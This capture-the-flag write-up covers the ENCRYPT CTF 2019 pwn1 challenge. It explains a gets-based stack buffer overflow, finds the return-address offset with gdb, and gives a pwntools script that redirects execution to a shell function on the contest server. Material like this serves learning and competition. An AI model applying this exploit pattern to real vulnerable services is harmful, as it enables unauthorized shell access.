ENCRYPT CTF 2019 - pwn1(Pwn 50)
First of all, I decoded it by using GHIDRA!!
- main() function has the BoF vulnerability (There are no length check, and it uses gets/puts)
- shell() function calls "/bin/sh".
So the tactic is, overwrite the return-address by the address of shell() -> 0x80484b3
Step1: Identify the position of the return-address.
-> Execute the pwn1 on gdb , and I input these string.
Tell me your name: 0123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
->Segmentation fault occured on 0x36373537
It means,the return address appears after a 140-character redundant string.
Step2: Write the script to win.
Followings are my script.
# coding:utf-8
from pwn import remote, p32
host = "104.154.106.182"
port = 2345
r = remote(host, port)
r.recvuntil("Tell me your name: ")
code = "A" * 140 # dummy
code += p32(0x80484b3)
print(code)
r.sendline(code)
r.interactive()
I got following result.
flag is: encryptCTF{Buff3R_0v3rfl0W5_4r3_345Y}
This is first time I got the PWN flag after join in my team.
Congrats to me ^^